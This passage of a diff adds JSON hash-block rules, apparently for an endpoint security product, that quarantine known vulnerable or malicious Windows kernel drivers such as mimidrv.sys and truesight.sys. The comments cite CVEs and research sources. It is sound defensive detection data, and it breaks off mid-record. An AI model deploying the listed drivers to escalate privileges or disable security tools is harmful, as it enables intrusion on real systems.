+ "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.469114Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6e3e09583b7bba35ef21419bdc711984e8541eb20a29406940727f73cbb5064a", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "01dc7e0f-5b7c-5791-b9e9-2733c16e6ddb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.613478Z", + "creation_date": "2026-03-23T11:45:29.613480Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.613485Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b6bf2460e023b1005cc60e107b14a3cfdf9284cc378a086d92e5dcdf6e432e2c", + "comment": "ASRock vulnerable drivers - Privilege Escalation (aka AsrDrv10X.sys) [CVE-2018-10709] [https://www.exploit-db.com/exploits/45716] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "01fbb11e-4043-5052-b7c2-7563b0896683", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.978860Z", + "creation_date": "2026-03-23T11:45:29.978862Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.978867Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"93b266f38c3c3eaab475d81597abbd7cc07943035068bb6fd670dbbe15de0131", + "comment": "Vulnerable Kernel Driver (aka LgCoreTemp.sys) [https://www.loldrivers.io/drivers/2c3884d3-9e4f-4519-b18b-0969612621bc/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "02070751-a8b3-5e7f-8262-7d5d55529ecc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.471133Z", + "creation_date": "2026-03-23T11:45:30.471136Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.471145Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c6f7acc48d15f334a757a416809eb596d291952cf730a281de4a4423e18dce76", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "020827c1-7773-5550-9c17-86004207bb8b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + 
"last_update": "2026-03-23T11:45:30.473310Z", + "creation_date": "2026-03-23T11:45:30.473313Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.473322Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0484defcf1b5afbe573472753dc2395e528608b688e5c7d1d178164e48e7bed7", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0210c95b-1775-5ff8-ade4-b5221e50bc71", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.157580Z", + "creation_date": "2026-03-23T11:45:31.157585Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.157595Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6d0c587c704e2ca6feb8626df7817187f319e4677b393bf0b92386b2ac400e29", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ 
+ "id": "02128104-2530-560b-83b0-e6fcc4812cf3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.973375Z", + "creation_date": "2026-03-23T11:45:29.973377Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.973382Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "57ae8d2d962cdde554831415725583fcf4ae5fc844c19983a7c37e31b12109a3", + "comment": "Voicemod Sociedad Limitada vulnerable driver (aka vmdrv.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "021a40bf-7f63-5a68-8d55-86b3fe0a68e2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.480112Z", + "creation_date": "2026-03-23T11:45:31.480116Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + 
"endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.480126Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "936af11604944176e2ca24f03dd7383f55f2f24a228de72744f2896ac50432ff", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "021d2917-c36e-573c-aade-197dc442e200", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.486042Z", + "creation_date": "2026-03-23T11:45:31.486046Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.486056Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1f740ededb186a18cc8a6a315a796c73520e48bfbd282d48a734d37e0f2aa295", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "021fbfcf-9010-59e4-b386-b51716734a39", + "test_maturity_current_count": 0, + "test_maturity_delay": 
7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.834053Z", + "creation_date": "2026-03-23T11:45:30.834057Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.834064Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "21b21459993d49b83a44f5dfaa1817f7fada9ae1382b3156b79a10145bb9530a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0225663b-6c52-562c-8485-8dabfe50a324", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.968511Z", + "creation_date": "2026-03-23T11:45:29.968513Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.968518Z", + "rule_level": null, + "rule_level_override": 
null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "14adbf0bc43414a7700e5403100cff7fc6ade50bebfab16a17acf2fdda5a9da8", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "02267224-bcf4-5f48-9cc3-fa2668249be7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.830341Z", + "creation_date": "2026-03-23T11:45:31.830343Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.830348Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6dc7053d15b5c6bf57f53531263e135fbc064237ce2ae163a3072acb89dbf9b5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "022687b1-6e32-5eb5-99a0-caeaef5ed5e1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + 
"source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.156292Z", + "creation_date": "2026-03-23T11:45:31.156293Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.156299Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "eb7775fe2b3c6a82fb5308238b99412e1b8e11c6a48a03f7fed8fb31f5e9b2e5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "022ed932-0fd1-5208-9fd8-629ab48b4ad3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.459850Z", + "creation_date": "2026-03-23T11:45:30.459853Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.459861Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bbf564a02784d53b8006333406807c3539ee4a594585b1f3713325904cb730ec", 
+ "comment": "Vulnerable Kernel Driver (aka VBoxMouseNT.sys) [https://www.loldrivers.io/drivers/ecabc507-2cc7-4011-89ab-7d9d659e6f88/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0237524e-2deb-5599-a51e-38fdbafa6c0b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.823123Z", + "creation_date": "2026-03-23T11:45:30.823125Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.823131Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c25cb17f5879e9c2fb4c91adb18e24b50a94738d5deb62a4189065bcf2c1d86b", + "comment": "Vulnerable Kernel Driver (aka atlAccess.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "023a4130-a2e0-57af-9545-06a253b1cd65", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.834214Z", + 
"creation_date": "2026-03-23T11:45:30.834217Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.834225Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fc9c62312b035c2b954ee633b3e6c5cc7c5cca3e8c03b3818db49f69020185b7", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0244398e-db56-5e38-ab46-58c36fda2e2d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.145546Z", + "creation_date": "2026-03-23T11:45:32.145549Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.145555Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a1f79a2e1441970bb3e7c838f8c14a8f3d39a46b0ff9648614e922ac475c743d", + "comment": "Vulnerable Kernel Driver (aka ADRMDRVSYS.sys) [https://www.loldrivers.io/drivers/48aeea9b-7812-4b25-9835-baaebe7dc551/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"024bed7d-e9ba-58a8-a5ba-2e132030e4ee", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.621686Z", + "creation_date": "2026-03-23T11:45:29.621688Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.621693Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "48891874441c6fa69e5518d98c53d83b723573e280c6c65ccfbde9039a6458c9", + "comment": "ASUSTeK GPU vulnerable physmem driver (aka AsIO2_64.sys) [https://syscall.eu/blog/2020/03/30/asus_gio/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "025c31d8-a310-58bc-9d95-e2d49f2e917e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.480544Z", + "creation_date": "2026-03-23T11:45:30.480546Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.480551Z", + "rule_level": null, 
+ "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "37b0aaf4e3cdc9d4c475a3a08ad2ba1e28e177d7359546c9b0bba14ae73dfed0", + "comment": "Vulnerable Kernel Driver (aka GtcKmdfBs.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0263d854-319f-5b8b-b575-ab9a1bc1f3f0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.829341Z", + "creation_date": "2026-03-23T11:45:30.829343Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.829348Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a35bcff21cb4869740ebf64cb6316c28acef3fbd03e33c38f4a97c9ea442dde1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0266b22b-3019-5aab-bf3d-282d4cea4c72", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": 
"moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.480010Z", + "creation_date": "2026-03-23T11:45:30.480012Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.480018Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "655110646bff890c448c0951e11132dc3592bda6e080696341b930d090224723", + "comment": "Vulnerable Kernel Driver (aka gpcidrv64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0266cec8-c150-5aa8-b4d4-992fdb7759a5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.483752Z", + "creation_date": "2026-03-23T11:45:31.483756Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.483766Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f6f3379b18b84b4bfe6ab0f5e332956f6f87ca5062aa3acd4739d9a6d3c33392", + "comment": "Vulnerable Adlice 
Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "026d57f8-faaa-552f-ae4b-c54e7a8f8528", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.621530Z", + "creation_date": "2026-03-23T11:45:29.621532Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.621537Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7236c8ff33c0e5cfa956778aa7303f1979f3bf709c361399fa1ce101b7e355b8", + "comment": "ASUSTeK GPU vulnerable physmem driver (aka AsIO2_64.sys) [https://syscall.eu/blog/2020/03/30/asus_gio/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "027a1ffb-92c1-5578-876a-1456143ef7ad", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.469951Z", + "creation_date": 
"2026-03-23T11:45:30.469954Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.469964Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "16274f4d9293fff056268a2d53c1a2e27db26d6b643f24651b5f2a0c055b7f40", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "027d6a6a-7489-5e2f-b40d-df770288208b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.479984Z", + "creation_date": "2026-03-23T11:45:31.479988Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.479997Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "19429c971c279d564c84b24efadc66a0ccdea4e45cf0f795fb59f7b0e46387b0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0283cc9a-8dbe-577b-86d7-04cb2857605c", + 
